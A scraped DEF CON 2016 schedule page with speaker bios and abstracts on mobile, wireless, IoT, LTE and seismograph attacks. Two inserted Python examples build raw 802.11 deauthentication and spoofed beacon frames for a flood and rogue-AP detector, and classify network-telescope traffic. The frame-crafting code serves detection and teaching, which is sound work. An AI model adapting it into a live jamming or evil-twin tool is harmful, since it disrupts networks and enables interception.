Marco Grassi is currently a Senior Security Researcher of the KEEN Lab of Tencent (previously known as KEEN Team). He was one of the main contributors at Pwn2Own 2016 for the Safari target with sandbox escape to root. He is a member of the team who won the title of ‘Master Of Pwn’ at Pwn2Own 2016. Formerly he was a member of NowSecure R&D Team, where he researched solutions for mobile security products and performed reverse engineering, pentesting and vulnerability research in mobile OS applications and devices. When he’s not poking around mobile devices, he enjoys developing embedded and electronic systems. He has spoken at several international security conferences such as ZeroNights, Black Hat, Codegate, HITB and cansecwest.
Twitter: @marcograss
Qidan He (a.k.a. Edward Flanker) is a security researcher focusing on mobile security at KeenLab of Tencent (formerly known as Keen Team). His major experience includes Android/iOS/OS X security and program analysis. He has reported several vulnerabilities in Android system core components, which were confirmed and credited in multiple advisories. He has also found multiple vulnerabilities in the OS X kernel, which are awaiting patch and credit. He is the winner of the Pwn2Own 2016 OS X category and a member of the Master of Pwn champion team. He has spoken at conferences such as Black Hat, CanSecWest, HITCON and QCON.
Twitter: @flanker_hqd
Return to Index
DEFCON - DEF CON 101 - Saturday - 16:30-16:59
Esoteric Exfiltration
Willa Cassandra Riggins (abyssknight) Penetration Tester, Veracode
When the machines rise up and take away our freedom to communicate we're going to need a way out. Exfiltration of data across trust boundaries will be our only means of communication. How do we do that when the infrastructure we built to defend ourselves is the very boundary we must defeat? We use the same pathways we used to, but bend the rules to meet our needs. Whether it's breaking protocol, attaching payloads, or pirating the airwaves, we'll find a way. We'll cover using a custom server application to accept 'benign' traffic, using social and file sharing to hide messages, as well as demo some long range mesh RF hardware you can drop at a target for maximum covert ops.
Willa Cassandra Riggins is a penetration tester at Veracode, and was previously part of the Lockheed Martin CIS Red Team. She started her career as a developer and pivoted into security to help fight the pandemic that is developer apathy. Her background spans the software development lifecycle, but her heart is in root shells and crown jewels. She can be found making things at FamiLAB in Orlando, hacking at the local DC407 meet-ups, staffing the socials at BSides Orlando, and marketing all the things at OWASP Orlando.
Twitter: @willasaywhat
Return to Index
BHV - Skyview 4 - Saturday - 13:30-13:59
Speaker: John Sundman
@jsundmanus
johnsundman.com
About John Sundman:
John Sundman has been writing about hacking in general and biohacking in particular, in both fiction and nonfiction genres, for twenty years. His 1999 novel Acts of the Apostles anticipated many of the developments we're seeing today.
Of Sundman's novels, the legendary synthetic biologist George Church said,
"Sundman is a master of machines —computing, biological and political — and his books include details that will convince an expert, and yet enchant a distant outsider with a compelling page-turner plot. Not just plot and mechanisms, but unforgettable personalities that haunt us long after the pages stop."
A 1+ hour conversation between me & Church can be found here.
Abstract:
The convergence of biological and digital technologies is one of the most significant aspects of the world we inhabit -- perhaps *the* most significant, since from this convergence we can plausibly extrapolate to near futures featuring everything from the elimination of poverty, want and death to the end of life on earth. This trend has been evident for a while, but CRISPR puts it in our faces.
Unlike, say, nuclear technology, biodigital technology is inherently democratic. We are in a biohacking maker world, and we're not going back.
The positive uses for these technologies are limitless, and many of them easy to imagine. The dangers are a little less obvious, but many of them can be anticipated, and there are certain to be unanticipated dangers as well. The potential for societal disruption, among others, has been widely underestimated.
What ethical responsibilities do biohackers and scientists bear? And do artists and intellectuals, writers in particular, have an obligation to take on these subjects, maybe even provide some guidance?
Return to Index
Wireless - Skyview 1 - Saturday - 11:00-11:50
Matt Trimble (dEM)
Bio
Matt Trimble is the Global Cyber Security Team Manager for Barracuda Networks. Matt's duties include Barracuda Networks' product security testing, Bug Bounty, Red Team, and CIRT. Matt spends most of his time leading his team of miscreants in trying to make the Internet a safer place for its denizens.
When Matt isn't putting out the latest Internet fire, he enjoys spending time with his wife and four kids. He enjoys hiking, jogging, and biking. Matt also enjoys hacking challenges. In 2015, Matt was on the team that won the DEF CON Wireless CTF.
Eric Escobar (JusticeBeaver)
Bio
Eric Escobar is a Security Engineer at Barracuda Networks. His interests are broad and generally include putting computers in places you wouldn't expect. From chicken coops to rockets and even bee hives. Before being called to the dark side, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR, and Ham Radio. Last year his team placed 1st in DEF CON 23's Wireless CTF.
Evil ESP
Abstract
This talk is about using the ESP8266 (ESP) WiFi module for nefariously awesome purposes. We intend to perform live demonstrations of the ESP in action and to show how easy it can be to program (once you know how). The goal is to show how game-changing a disposable (less than $3) WiFi device with extremely low power draw can be for the security community.
The talk will begin with an overview of what the ESP is, how to program it, and some history of the device. We will touch on our trials and tribulations in translating the documentation and how, to a large extent, this is no longer needed.
We will demonstrate using the ESP as a quick and dirty WiFi jamming device using both AP BSSID cloning and de-auth injection. Note that this should only be done for research purposes, as it may be considered radio jamming by the FCC, and thus illegal. We will talk about why both troubleshooting what is occurring and finding the device responsible for the attack are difficult. We will demonstrate an ESP-based de-auth-o-matic.
We will then build on the previous topics and discuss the ESP's use as a disposable Evil Twin. We will demonstrate using the ESP as an evil AP in a fictitious attack in a residential setting.
We will show how combining an ESP with other low-cost IoT devices, like the HopeRF transceiver, can drastically increase the breadth of its capabilities. We will demonstrate a remote-controlled de-auth device and how this decreases the risk to someone cracking a WiFi network.
We will close with a discussion that builds on the previous topics. We will discuss using the ESP as a disposable node in a low-cost mass surveillance mesh network.
We will end with a Q&A session.
Detecting and Finding Rogue Access Points
Abstract
Rogue access points are a security concern for businesses, individuals, and muggles alike. The ability to detect and find a rogue access point is an invaluable skill to add to your hacker utility belt. This presentation will discuss how to detect rogue access points (APs) and what to do once you've detected one. We'll discuss inexpensive tools to add to your bag (once the Amazon drone has delivered them), including types of antennas, network adapters and some other odds and ends to round out your toolbox.
Once we've covered some of the basics and outfitted your bag, we'll chat about techniques you can use to find that rogue AP, whether that be wardriving your neighborhood or suiting up your pet with tech. This talk will cover tactics we've used to Find the Fox at the past couple of wireless capture the flag competitions, and even how to create a pretty heat map of wireless access points in your neighborhood. We'll talk about tactics we've used in the field and all the ways we've messed it up.
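The two Barracuda talks above are two sides of one problem: the ESP talk injects de-auth frames and clones a BSSID; the rogue AP talk wants to notice that happening. As an added example covering both (editor's code, not the speakers' ESP firmware or CTF tooling), the script below builds the two 802.11 management frames involved, a deauthentication frame and a beacon, and runs a small monitor over a constructed capture that flags a de-auth flood by source MAC and a beacon advertising a known SSID from a BSSID that is not on the authorized list. MAC addresses, timestamps, the 20-frames-in-5-seconds flood threshold, and the known-AP table are assumptions; note that the flood alert names the MAC the ESP is spoofing (the real AP), which is exactly why the abstract says the device itself is hard to find.

```python
"""Added example, not the speakers' code: build 802.11 deauth and beacon
frames, then detect de-auth floods and rogue (evil twin) beacons in a
constructed capture of (timestamp, raw_frame) pairs."""
import struct


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mgmt_header(subtype, dst, src, bssid, seq=0):
    """24-byte management header; frame control = subtype<<4 | type 0 | version 0."""
    fc = struct.pack("<H", subtype << 4)
    return (fc + struct.pack("<H", 0) + mac(dst) + mac(src) + mac(bssid)
            + struct.pack("<H", seq << 4))


def deauth_frame(dst, src, bssid, reason=7):
    """Subtype 12 plus a 2-byte reason code (7: class 3 frame from non-associated STA)."""
    return mgmt_header(12, dst, src, bssid) + struct.pack("<H", reason)


def beacon_frame(bssid, ssid, interval=100):
    """Subtype 8: timestamp, beacon interval, capability, then the SSID element (tag 0)."""
    body = struct.pack("<QHH", 0, interval, 0x0411)
    ssid_b = ssid.encode()
    body += struct.pack("BB", 0, len(ssid_b)) + ssid_b
    return mgmt_header(8, "ff:ff:ff:ff:ff:ff", bssid, bssid) + body


def parse(frame):
    """(subtype, addr1, addr2, addr3, body) for a management frame, else None."""
    fc, = struct.unpack_from("<H", frame, 0)
    if (fc >> 2) & 0x3 != 0:
        return None                      # not a management frame
    subtype = (fc >> 4) & 0xF
    return (subtype, mac_str(frame[4:10]), mac_str(frame[10:16]),
            mac_str(frame[16:22]), frame[24:])


def beacon_ssid(body):
    """Walk the tagged parameters after the 12 fixed bytes and return the SSID."""
    pos = 12
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        if tag == 0:
            return body[pos + 2:pos + 2 + length].decode(errors="replace")
        pos += 2 + length
    return None


def monitor(capture, known_aps, flood_threshold=20, window=5.0):
    """capture: [(timestamp, frame)]; known_aps: {ssid: {authorized bssid, ...}}."""
    alerts = []
    deauth_times = {}                    # source MAC -> recent deauth timestamps
    for ts, frame in capture:
        p = parse(frame)
        if p is None:
            continue
        subtype, _, src, _, body = p
        if subtype == 12:
            times = deauth_times.setdefault(src, [])
            times.append(ts)
            while times and ts - times[0] > window:
                times.pop(0)
            if len(times) == flood_threshold:
                alerts.append(f"deauth flood from {src}: {flood_threshold} in {window}s")
        elif subtype == 8:
            ssid = beacon_ssid(body)
            if ssid in known_aps and src not in known_aps[ssid]:
                alerts.append(f"rogue AP {src} advertising '{ssid}'")
    return alerts


# Constructed capture: legitimate beacon, a spoofed-source deauth burst, an evil twin.
KNOWN = {"CorpWiFi": {"00:11:22:33:44:55"}}
CAPTURE = (
    [(0.0, beacon_frame("00:11:22:33:44:55", "CorpWiFi"))]
    + [(0.1 * i, deauth_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55",
                              "00:11:22:33:44:55")) for i in range(25)]
    + [(3.0, beacon_frame("de:ad:be:ef:00:01", "CorpWiFi"))]
)

if __name__ == "__main__":
    for a in monitor(CAPTURE, KNOWN):
        print(a)
```

A real monitor would feed `parse` from a monitor-mode interface (radiotap stripped) and would fold in RSSI per BSSID, which is the signal the heat-map and Find-the-Fox tactics in the second abstract use to walk toward the device.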
Return to Index
DEFCON - Track Three - Sunday - 10:00-10:59
Examining the Internet's pollution
Karyn Benson Graduate Student
Network telescopes are collections of unused but BGP-announced IP addresses. They collect the pollution of the Internet: scanning, misconfigurations, backscatter from DoS attacks, bugs, etc. For example, several historical studies used network telescopes to examine worm outbreaks.
In this talk I will discuss phenomena that have recently induced many sources to send traffic to network telescopes. By examining this pollution we find a wealth of security-related data. Specifically, I'll touch on scanning trends, DoS attacks that leverage open DNS resolvers to overwhelm authoritative name servers, BitTorrent index poisoning attacks (which targeted torrents with China in their name), a byte order bug in Qihoo 360 (while updating, this security software sent acknowledgements to wrong IP addresses... for 5 years), and the consequence of an error in Sality's distributed hash table.
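A first-pass classifier for the "pollution" described above, as an added example (editor's code, not Karyn Benson's analysis pipeline). It applies the standard telescope heuristics per source: SYN/ACK or RST arriving unsolicited at dark space is backscatter from a DoS victim replying to spoofed SYNs; one source touching many dark addresses is a scanner; unsolicited DNS queries to dark addresses point at open-resolver hunting or reflection traffic; the remainder is the misconfiguration-and-bugs bucket the talk enumerates. The packet records and the 10-host scan threshold are constructed assumptions.

```python
"""Added example, not Karyn Benson's code: classify traffic arriving at a
network telescope (dark, BGP-announced address space) by source."""
from collections import Counter, defaultdict


def dark(i):
    return f"192.0.2.{i}"            # constructed dark /24


# (src, dst, proto, sport, dport, tcp_flags); flags "" for non-TCP.
PACKETS = (
    [("198.51.100.9", dark(i), "tcp", 40000 + i, 23, "S") for i in range(1, 13)]
    + [("203.0.113.50", dark(i), "tcp", 80, 5000 + i, "SA") for i in range(1, 4)]
    + [("203.0.113.50", dark(7), "tcp", 80, 5007, "R")]
    + [("203.0.113.200", dark(9), "udp", 3001, 53, "")]
    + [("198.51.100.77", dark(20), "udp", 12345, 12345, "")]
)

BACKSCATTER_FLAGS = {"SA", "R", "RA"}   # replies that imply a spoofed request


def classify(packets, scan_threshold=10):
    """Return {src: verdict string}."""
    per_src = defaultdict(list)
    for p in packets:
        per_src[p[0]].append(p)
    verdict = {}
    for src, pkts in per_src.items():
        dsts = {p[1] for p in pkts}
        flags = Counter(p[5] for p in pkts if p[2] == "tcp")
        if flags and all(f in BACKSCATTER_FLAGS for f in flags):
            verdict[src] = f"backscatter: {src} is likely a DoS victim"
        elif len(dsts) >= scan_threshold and flags.get("S", 0) >= scan_threshold:
            verdict[src] = f"scan: {len(dsts)} dark hosts, dports {sorted({p[4] for p in pkts})}"
        elif any(p[2] == "udp" and p[4] == 53 for p in pkts):
            verdict[src] = "unsolicited DNS query: open-resolver scan or reflection traffic"
        else:
            verdict[src] = "other: misconfiguration or bug"
    return verdict


if __name__ == "__main__":
    for src, v in classify(PACKETS).items():
        print(src, "->", v)
```

The backscatter rule is the useful inversion: the telescope never sees the attack itself, only the victim's replies, so the source address of that traffic is the victim, not the attacker.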
Karyn recently defended her PhD in computer science. Prior to starting graduate school she wrote intrusion detection software for the US Army. When not looking at packets, Karb eats tacos, runs marathons, and collects state quarters.
Return to Index
Workshops - Las Vegas Ballroom 4 - Friday - 10:00-14:00
Exploit Development for Beginners
Sam Bowne Professor, City College San Francisco
Dylan James Smith
This workshop helps participants move beyond using attacks others have developed to understanding how programs work at the binary level and how to exploit their weaknesses. With these techniques, you can find new vulnerabilities and write proof-of-concept attack code, compete in cyber competitions, or earn bug bounties.
All materials, projects, and challenges are freely available at samsclass.info.
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, HOPE, B-Sides SF, B-Sides LV, and many other cons. He has a PhD and a CISSP and a lot of T-shirts.
Dylan James Smith assisted Sam Bowne with hands-on workshops last year at DEF CON and B-Sides LV. He's a Mac guru and skilled at fixing PC's, Linux problems, and network problems too.
Max Class Size: 55
Prerequisites for students: Familiarity with C, Python, and assembly code is helpful but not required.
Materials or Equipment students will need to bring to participate: Participants need a computer with Kali Linux running, either in a virtual machine or locally. I will have a few loaner computers for students who don't have a usable computer.
Return to Index
IOT - Bronze 4 - Friday - 10:10-10:59
Exploiting a Smart Fridge: a Case Study in Kinetic Cyber
Kevin Cooper
Networked smart appliances can reduce energy costs and provide detailed situational awareness. However, the same remote access used for benevolent command and control can be leveraged by an adversary for reconnaissance and to cause real-world kinetic effects if security is compromised. In this talk, we exploit a commercially available smart fridge to evaluate its sensor capabilities and to demonstrate the potential for delivering kinetic cyber effects. As a proof of concept, we use the fridge's ambient humidity sensor to reveal its geographic location and nearby human activity. We also quantify the potential for intentional flooding. Finally, the fridge compartments are heated by abusing the compressor and defrosters to evaluate the potential for damaging temperature-sensitive medical supplies. We demonstrate that within two hours the refrigeration compartment and freezer can be raised above 30 °C (86 °F) and 20 °C (68 °F), respectively, remotely via the Internet.
We highlight the interesting things that an attacker can do with network access to a smart fridge. How hot can the fridge get when the attacker turns off cooling and blasts the defrosters? How much water per hour can be released out of the fridge door? We answer these questions and more. We also show that the fridge ambient humidity sensor is sensitive enough to tell whether or not it is raining outside, which reveals geographic location. Hell, we will even give away hardware to the crowd.
Kevin Cooper is a computer scientist with a passion for network security. He frequently competes in CTF exercises and has extensive experience with reverse engineering, digital forensics, and network penetration testing.
Coauthor: Ben Ramsey, PhD, CISSP, has been building and breaking networks for over a decade. He specializes in embedded system security and low-rate wireless protocols, such as ZigBee, Z-Wave, and Bluetooth Low Energy. He has published in academic journals and presented his research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
Return to Index
DEFCON - Track Three - Saturday - 15:00-15:59
Exploiting and Attacking Seismological Networks... Remotely
Bertin Bervis Bonilla Founder, NETDB.IO
James Jara Founder & CTO, NETDB.IO
In this presentation we will explain and demonstrate, step by step in a real attack scenario, how a remote attacker could elevate privileges in order to remotely take control of a production seismological network located 183 m under the sea. We found several production seismographs connected to the public Internet, providing graphs and data to anyone who connects to the embedded web server running on port 80. The seismographs provide real-time data based on perturbations from the earth and its surroundings; we consider this critical infrastructure, and the lack of protection and proper deployment by the technicians in charge is clear.
We are going to present 3 ways to exploit the seismograph, which is made up of the following parts:
- Modem (GSM, Wi-Fi, satellite, GPS, serial COM), running a web server on port 80 and an SSH daemon
- Sensor (the device collecting the data from the ground or the ocean bottom)
- Battery (1 year lifetime)
- Apollo server (the main acquisition core server)
These vulnerabilities affect the modem, which is directly connected to the sensor; a remote connection to the modem is all you need to compromise the whole seismograph network. After getting a root shell, our goal is to execute a post-exploitation attack: this specific attack corrupts/modifies the whole seismological research data of a country or area in real time. We will propose recommendations and best practices on how to deploy a seismological network in order to avoid these nasty attacks.
Bertin Bervis Bonilla is a security researcher focused on offensive security, reverse engineering, and network attack and defense. Bertin has spoken at several security conferences in his country and in Latin America, such as OWASP Latin Tour, DragonJAR conference and EKOPARTY. He is the founder of NetDB, the Network Database project, a computer fingerprint/certificate-driven search engine. He was formerly a network engineer working for a five-letter US networking company in San Jose, Costa Rica.
Twitter: @bertinjoseb
James Jara is the founder and CTO of NETDB.IO, an Internet of Things search engine focused on info-security research. He likes the Bitcoin industry, open source and framework development, and has given various presentations at security conferences such as EkoParty. He is interested in machine learning for mobile, Internet of Things (IoT) devices and industrial systems used in critical infrastructure networks. Sport-coder!
Return to Index
BHV - Skyview 4 - Friday - 10:30-10:59
Speaker: Amal Graafstra
@amal
dangerousthings.com
About Amal:
Adventure technologist and biohacker Amal Graafstra has always been interested in technology. In 2005 he became the world’s first double RFID implantee. Amal had two small RFID transponders implanted, one into each hand, and he still uses them to open doors, start his vehicles, and log into his computer. Since implanting himself, he’s written a book called RFID Toys, become a TEDx speaker, appeared on a multitude of television programs, and been the subject of various documentaries. He's also started a biohacking company called Dangerous Things which developed the world’s first and only NFC compliant implantable transponder. He continues to explore biohacking and transhumanism while developing next generation implantable technologies.
Abstract:
Amal covers the rise of biohacking, implantables, and the future of biohacking.
Return to Index
IOT - Bronze 4 - Friday - 12:10-12:59
The FCC's Cybersecurity Risk Reduction Initiatives and Activities
Rear Admiral (ret.) David Simpson, FCC, Bureau Chief
The consumer benefits of the IoT are anticipated to be exceedingly large, with 5G wireless technologies underpinning much of the evolving IoT landscape. However, IoT will also greatly expand the cyber attack surface of consumer appliances. This session will discuss the FCC's initiatives to better posture the telecommunications sector to combat cyber threats to the communications critical infrastructure, and solicit attendee participation in developing appropriate FCC policy objectives for 5G.
This is not a typical government monologue; this talk is an interactive, engaging, informative discussion of the FCC's cybersecurity risk reduction initiatives to combat the most pressing threats to the communications critical infrastructure that would undermine the integrity and deployment of the IoT. It will explain the unique vulnerabilities inherent in 5G and explore opportunities to design 5G in a manner that reduces risk for the IoT.
Rear Admiral (ret.) David Simpson was appointed Chief of the FCC's Public Safety and Homeland Security Bureau in November 2013. He brings to this role more than 20 years of ICT experience supporting the DoD, working closely with other agencies to provide secure communication services and improve cyber defense readiness. Simpson is a native of Burbank, CA and a 1982 graduate of the United States Naval Academy. He earned a master's degree in systems technology from the Naval Postgraduate School.
Return to Index
DEFCON - Track One - Friday - 10:00-10:59
Feds and 0Days: From Before Heartbleed to After FBI-Apple
Jay Healey Senior Research Scholar, Columbia University
Does the FBI have to tell Apple of the vuln it used to break their iPhone? How many 0days every year go into the NSA arsenal -- dozens, hundreds or thousands? Are there any grown-ups in Washington DC watching over FBI or NSA as they decide what vulns to disclose to vendors and which to keep to themselves? These are all key questions which have dominated so much of 2016, yet there's been relatively little reliable information for us to go on, to learn what the Feds are up to and whether it passes any definition of reasonableness.
Based on open-source research and interviews with many of the principal participants, this talk starts with the pre-history beginning in the 1990s before examining the current process and players (as it turns out, NSA prefers to discover its own vulns; CIA prefers to buy). The current process is run from the White House with "a bias to disclose", driven by a decision by the President (because of the Snowden revelations). The entire process was made public when NSA was forced to deny media reports that it had prior knowledge of Heartbleed.
Jason Healey is a Senior Research Scholar at Columbia University's School of International and Public Affairs. During his time in the White House, he coordinated efforts to secure the Internet and US critical infrastructure. He started his career as a US Air Force intelligence officer, where he helped create the first joint cyber command in 1998, and is a Senior Fellow at the Atlantic Council.
Twitter: @Jason_Healey
Return to Index
WOS - Skyview 6 - Saturday - 18:10-18:59
Fiddler on the Roof: A No-Nonsense Look at Fiddler and Its Usage
Morgan "Indrora" Gangwere
Fiddler lives in the same family as mitmproxy, Burp, and other "man in the middle" tools. Topics covered in this talk include: scripting the Fiddler proxy, making arbitrary requests, redirection and attacking Windows 8 and UAP applications.
Morgan "Indrora" Gangwere (Twitter: @indrora) is a student at the University of New Mexico. He breaks things for fun when not studying.
Return to Index
SkyTalks - Skyview 3 - Friday - 14:00-14:59
Speaker: Marcelo Mansur
Talk: Financial Crime: Past, Present, and Future
Starting with my own experience working in what turned out to be a boiler room investment brokerage, this talk will cover how financial crime has changed over the past 20 years and how black hat hackers and cryptocurrency are the new weapons of white collar fraudsters.
Return to Index
BHV - Skyview 4 - Friday - 12:30-12:59
Speaker: Alan
About Alan:
Alan is an award-winning serial biotech entrepreneur and is currently CEO of MiraculeX, an early-stage company developing the first great-tasting and healthy consumer sweeteners. He has 10 years of experience working in both academia and industry on medical devices and protein engineering. Alan graduated from NYU School of Engineering with a dual M.S. in biotechnology and entrepreneurship. He is an alum of NYU Launchpad, ELab NYC, Harlem Biospace and IndieBio.
Abstract:
By combining hydroponics with the newest plant genetic engineering technologies, we are creating a new paradigm for the production of healthy sweeteners at affordable costs. Our ultimate vision is to create a future where everyone can finally enjoy the foods they crave, without worry.
Return to Index
DEFCON - Track One - Saturday - 15:00-15:59
Forcing a Targeted LTE Cellphone into an Unsafe Network
Haoqi Shan Hardware/Wireless security researcher, Qihoo 360
Wanqiao Zhang Communication security researcher, Qihoo 360
LTE is a more advanced mobile network, but it is not absolutely secure. Several recent papers have exposed vulnerabilities in the LTE network. In this presentation, we will introduce one method which jointly exploits the vulnerabilities in the tracking area update procedure, the attach procedure, and the RRC redirection procedure, and can finally force a targeted LTE cellphone to downgrade into a malicious GSM network, after which its data traffic or even voice calls can be eavesdropped. This attack is not a simple DoS attack. It can select the targeted cellphone by filtering on the IMSI number (IMSI catcher function), so it will not influence the other cellphones, which remain in the real network. Furthermore, it can force the cellphone into a malicious network that we set up (a fake network) or one that we assign (an operator's network), so the cellphone has no chance to choose another, secure network. This is the danger point of this attack.
Haoqi Shan is currently a wireless/hardware security researcher in Unicorn Team. He focuses on the GSM system, router/switch hacking, etc. Other research interests include reverse engineering of embedded devices such as femtocell base stations. He has given presentations about GSM device hacking and wireless hacking suites at DEF CON, CanSecWest and SyScan.
Wanqiao Zhang is a communication security researcher from Unicorn Team of Qihoo 360 China. She received her master's degree in electronic information engineering from Nanjing University of Aeronautics and Astronautics in 2015. Fascinated by the world of wireless security, she currently focuses on security research of the GPS system and the cellular network.
Return to Index
SkyTalks - Skyview 3 - Sunday - 11:00-11:59
Speaker: obiwan666
Talk: Front Door Nightmare
I will present a closer look at electro-mechanical door locks. We will learn how these locks work in general and the different techniques used by different vendors. After the overview, we will dig deeper into the details of the locks and look at how they work. Now, after we have learned how it works, we will open one with an RFID transponder and fake a medium. But wait. This is too easy. Many others have done this before. I will show how to open the locks without a valid RFID transponder, why this is possible and where the needed tools can be found. The audience will learn where to look for good and bad locks. A sample of a secure design, and how to identify one, will be shown.
Long Description: The problem with those electromechanical locks is mostly in the design of the lock. I am looking at the interface of the PCB (the RFID part) to the locking mechanism. Many vendors design the locks in a wrong way. Most attacks can be done with the battery change equipment and a closer look at what's in there. It's so easy when you know where to look and how to identify a bad design. On the other hand, there are also good vendors with a very secure hardware design. I will not discuss the RFID problems, only give a short overview.
Return to Index
DEFCON - Track One - Friday - 12:30-12:59
Frontrunning the Frontrunners
Dr. Paul Vixie, CEO and Co-founder, Farsight Security, Inc.
While some domainers allegedly brainstorm ideas for new domains to register while taking a shower, the more successful domain portfolio managers, working at scale, are believed to be ‘data driven.’ DNS queries are a material source of intelligence about domainer opportunities and operations, and also help us to understand the operational constraints around potentially combating domainers, should we want to do so. In this presentation, co-authored with Farsight Security Scientist Dr. Joe St Sauver, Farsight Security CEO Dr. Paul Vixie will scrutinize failed DNS queries (‘NXDOMAINs’), looking for the same ‘opportunities’ that a domainer or typo squatter would (although we will not be acting on that data by actually registering domains).
Dr. Vixie will discuss two primary types of behavior: 1) Volumetrically-driven typo-squatting, which Dr. Vixie will measure by computing the volume of NXDOMAINs seen by domain during a 24-hour period, and the time between popular typos appearing in NXDOMAINs and those same domains being registered and actually used, and 2) Domainers programmatically exploring permutations of domains around high-value domains, probing for available domains and automatically registering the most promising probed domains discovered to still be available. Both of these hypothesized behaviors should be externally observable and thus able to be confirmed by watching a real-time stream of NXDOMAIN errors and a real-time stream of newly observed, actually-registered domains, as available from the Security Information Exchange.
Dr. Paul Vixie will experimentally confirm these hypothesized relationships and describe examples of (1) the most commonly observed types of typographical errors, (2) the brands apparently most-targeted for squatting, (3) the distribution of delays from NXDOMAIN detection to observed domain use, (4) the potential relationship between NXDOMAIN volume thresholds and TLD cost. Dr. Vixie will also explain how this information illuminates opportunities for tackling these types of domain name abuse. Time will be reserved for Q&A.
Dr. Paul Vixie is the CEO and Co-founder of Farsight Security. He previously served as President, Chairman and Founder of Internet Systems Consortium (ISC), as President of MAPS, PAIX and MIBH, as CTO of Abovenet/MFN, and on the boards of several for-profit and non-profit companies. He served on the ARIN Board of Trustees from 2005 to 2013, as ARIN Chairman in 2008 and 2009, and was a founding member of the ICANN Root Server System Advisory Committee (RSSAC) and the ICANN Security and Stability Advisory Committee (SSAC). He operated ISC's F-Root name server for many years, and is a member of Cogent's C-Root team. He is a sysadmin for Op-Sec-Trust. Dr. Vixie has been contributing to Internet protocols and UNIX systems as a protocol designer and software architect since 1980. He wrote Cron (for BSD and Linux), and is considered the primary author and technical architect of BIND 4.9 and BIND 8, and he hired many of the people who wrote BIND 9. He has authored or co-authored a dozen or so RFCs, mostly on DNS and related topics, and is co-author of Sendmail: Theory and Practice (Digital Press, 1994). His technical contributions include DNS Response Rate Limiting (RRL), DNS Response Policy Zones (RPZ), and Network Telemetry Capture (NCAP). He earned his Ph.D. from Keio University for work related to DNS and DNSSEC, and was named to the Internet Hall of Fame in 2014.
Twitter: @paulvixie
Return to Index
BHV - Skyview 4 - Friday - 10:00-10:59
Speaker: Ryan O'Shea
About Ryan O'Shea:
Ryan O’Shea is a futurist, biohacker, and television personality based in Pittsburgh, Pennsylvania. He is the creator and host of the acclaimed futurism, science, and technology themed podcast Future Grind and currently serves as the spokesman and advisor of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities. He's worked as a producer and consultant on numerous film and television projects related to biohacking and currently represents the Jet Propulsion Laboratory as a Solar System Ambassador, a program operated by the California Institute of Technology for NASA.
Abstract:
Biohacking is moving from niche science fiction to popular culture, the human body is now a part of the Internet of Things, and finger magnet and RFID implants are gaining traction. But this is just the beginning. Futurist podcast host and Grindhouse Wetware spokesman Ryan O'Shea lays out the potential future of human augmentation and explains how this type of directed evolution is really just an extension of what humans have already been doing for generations.
Return to Index
Workshops - Las Vegas Ballroom 5 - Saturday - 14:00-18:00
Fuzzing Android Devices
Anto Joseph Security Engineer, Intel
Droid-FF is the very first Android fuzzing framework, which helps researchers find memory corruption bugs in code written in C/C++. In this workshop, all you need to start fuzzing mobile devices is presented as a VM which is ready to go and easy to work with. You will get hands-on experience fuzzing real devices, finding bugs, tracing them back to source and triaging them for exploitability.
Anto Joseph is a Security Engineer for Intel. He is enthusiastic about mobile security and IoT. He is very passionate about research and is currently researching mobile malware. He has developed custom tools and fuzzers to help with penetration tests and vulnerability research. He has been a speaker/trainer at various security conferences including BruCON, Hack In Paris, HITB Amsterdam, NullCon, GroundZero, c0c0n, XorConf, etc., and has good expertise in practical security.
Max Class Size: 55
Prerequisites for students: Familiarity with the Android / iOS ecosystem
Materials or Equipment students will need to bring to participate: A laptop powerful enough to host two virtual machines in VirtualBox.
Return to Index
WOS - Skyview 6 - Saturday - 16:10-16:59
Fuzzing For Humans: Real Fuzzing in the Real World
Joshua Pereyda
Fuzzing tools are frequently seen in big-name conferences, attached to big-name hacks and big-name hackers. Fuzzers are an incredibly useful offensive tool, and equally critical for a defensive player. But anyone who has tried to use these big-name fuzzers to secure their own software has seen how ineffective they can be. The fuzzing world is plagued with over-hyped and under-developed fuzzers that will suck the life out of anyone who dares try to sort through their waterlogged codebase. Meanwhile, commercial players stand by ready to support big businesses, but not open source. Commercial fuzzers may be good business, and their existence is a boon for the industry, but they are not sufficient for widespread security. They keep the power of fuzzing locked up for those willing to pay big bucks. And the closed source nature stamps out community, leaving each business to develop their own practices. In this talk, Joshua will provide a practical perspective on fuzzing, explore the hurdles confronting current open source tools and pave a path forward. Attendees will also receive an introduction to DIY fuzzers using modern frameworks.
Joshua Pereyda (Twitter: @jtpereyda) is a software engineer specializing in information and network security. He currently works in the critical infrastructure industry with employers heavily invested in software and hardware security. Among his passions are hacking, teaching kids to program, Netflix with his wife, and figuring out how he can get paid to do it all -- legally.
Joshua is the maintainer of boofuzz, a fork of the renowned Sulley fuzzing framework. He has a hole in his heart to pour into the open source hacking community.
Return to Index
DEFCON - Track Three - Sunday - 12:00-12:59
Game over, man! – Reversing Video Games to Create an Unbeatable AI Player
Dan ‘AltF4’ Petro, Security Associate, Bishop Fox
"Super Smash Bros: Melee." - Furrowed brows, pain in your thumbs, trash talk your Mom would blush to hear. That sweet rush of power you once knew as you beat all the kids on your block will be but a distant memory as SmashBot challenges you to a duel for your pride — live on stage. SmashBot is the Artificial Intelligence I created that plays the cult classic video game Smash Bros optimally. It can't be bargained with. It can't be reasoned with. It doesn't feel pity, remorse, or fear. This final boss won't stop until all your lives are gone.
What started as a fun coding project in response to a simple dare grew into an obsession that encompassed the wombo-combo of hacking disciplines including binary reverse engineering, AI research, and programming. When not used to create a killer doomsday machine, these same skills translate to hacking Internet of Things (IoT) devices, developing shellcode, and more. Forget about Internet ending zero-day releases and new exploit kits. Come on down and get wrecked at a beloved old video game. Line up and take your turn trying to beat the AI yourself, live on the projectors for everyone to see. When you lose though, don't run home and go crying to yo Momma.
